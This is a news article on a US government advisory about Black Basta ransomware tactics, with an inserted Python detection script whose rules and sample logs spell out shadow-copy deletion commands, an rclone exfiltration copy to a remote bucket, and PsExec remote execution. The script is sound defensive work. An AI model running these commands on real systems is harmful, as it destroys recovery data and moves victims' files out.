
Black Basta Ransomware Hit Over 500 Organizations

The US government warns of Black Basta ransomware attacks targeting critical infrastructure organizations.

The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.

First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment.

In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations.

According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.

For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19.

After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.

The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions.

After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.
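The sequence described above (commodity tooling for lateral movement and exfiltration, followed by shadow-copy deletion right before encryption) is one that defenders can pick out of ordinary process-creation telemetry. The following script is an added example, not code from the advisory or from SecurityWeek: it runs a small set of rules over constructed, flattened Windows process-creation records (the `timestamp|host|user|parent|cmdline` layout, the host names and every log line are invented for this illustration) and highlights hosts where more than one stage of the chain appears. The rule set covers only the tools the article names (PsExec, Mimikatz, RClone, BITSAdmin) plus the two standard Windows commands used to delete volume shadow copies.

```python
"""Flag Black Basta-style post-compromise activity in process-creation logs.

Added example with constructed data: the events below are invented, the
field layout is an assumed flattened form of Windows event 4688, and the
tool names are limited to those named in the article.
"""
import re
from dataclasses import dataclass

# (technique label, regex over the command line). Patterns are deliberately
# loose on the executable name so renamed copies with the usual suffixes still hit.
RULES = [
    # Shadow-copy deletion hinders recovery and typically precedes encryption
    ("shadow-copy deletion", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("shadow-copy deletion", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    # Tooling named in the advisory for lateral movement, credential theft, exfiltration
    ("lateral movement (PsExec)", re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
    ("credential theft (Mimikatz)", re.compile(r"\bmimikatz(\.exe)?\b", re.I)),
    ("data exfiltration (RClone)", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("download/transfer (BITSAdmin)", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
]

# Constructed sample telemetry: two benign rows, then a short intrusion chain on FS-02.
SAMPLE_LOG = r"""
2024-05-10T02:14:05Z|WS-017|corp\jdoe|explorer.exe|"C:\Windows\System32\notepad.exe" notes.txt
2024-05-10T02:31:40Z|WS-017|corp\jdoe|cmd.exe|PsExec64.exe \\FS-02 -s cmd /c whoami
2024-05-10T02:45:12Z|FS-02|corp\svc_backup|cmd.exe|rclone.exe copy D:\Shares remote:bucket --transfers 16
2024-05-10T03:02:58Z|FS-02|NT AUTHORITY\SYSTEM|cmd.exe|vssadmin.exe delete shadows /all /quiet
2024-05-10T03:03:01Z|FS-02|NT AUTHORITY\SYSTEM|cmd.exe|wmic.exe shadowcopy delete
2024-05-10T08:00:00Z|WS-022|corp\asmith|explorer.exe|"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n
"""


@dataclass
class Event:
    ts: str
    host: str
    user: str
    parent: str
    cmdline: str


def parse_events(text):
    """Parse pipe-delimited rows into Event objects; malformed rows are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|", 4)  # cmdline may itself contain '|', so cap the split
        if len(parts) != 5:
            continue
        events.append(Event(*parts))
    return events


def scan(events):
    """Return one finding per event whose command line matches a rule (first rule wins)."""
    findings = []
    for ev in events:
        for label, pattern in RULES:
            if pattern.search(ev.cmdline):
                findings.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                                 "technique": label, "cmdline": ev.cmdline})
                break
    return findings


def hosts_with_chain(findings, min_techniques=2):
    """Hosts on which at least `min_techniques` distinct techniques were seen.

    A single PsExec launch may be an admin at work; exfiltration tooling
    followed by shadow-copy deletion on the same host is the pre-encryption
    pattern the article describes and deserves an immediate response.
    """
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["technique"])
    return sorted(h for h, techs in by_host.items() if len(techs) >= min_techniques)


if __name__ == "__main__":
    found = scan(parse_events(SAMPLE_LOG))
    for f in found:
        print(f"{f['ts']} {f['host']:<7} {f['technique']:<30} {f['cmdline']}")
    print("hosts showing a multi-stage chain:", hosts_with_chain(found))
```

Run against the constructed sample, the scan yields four findings and singles out FS-02, where exfiltration tooling and shadow-copy deletion appear within minutes of each other. In production the same rules would sit on a SIEM or EDR process-creation feed; the per-host aggregation is what turns individually noisy matches into an alert worth paging on.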


The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.

“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge the HPH sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise from Black Basta and other ransomware attacks,” the four government agencies note.

In January 2024, hacking research collective and consulting think tank SRLabs released a free decryptor to help Black Basta victims recover their data without paying a ransom.

Related: Free Decryptor Released for Black Basta Ransomware

Related: Black Basta Ransomware Linked to FIN7 Cybercrime Group

Related: New Black Basta Ransomware Possibly Linked to Conti Group

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
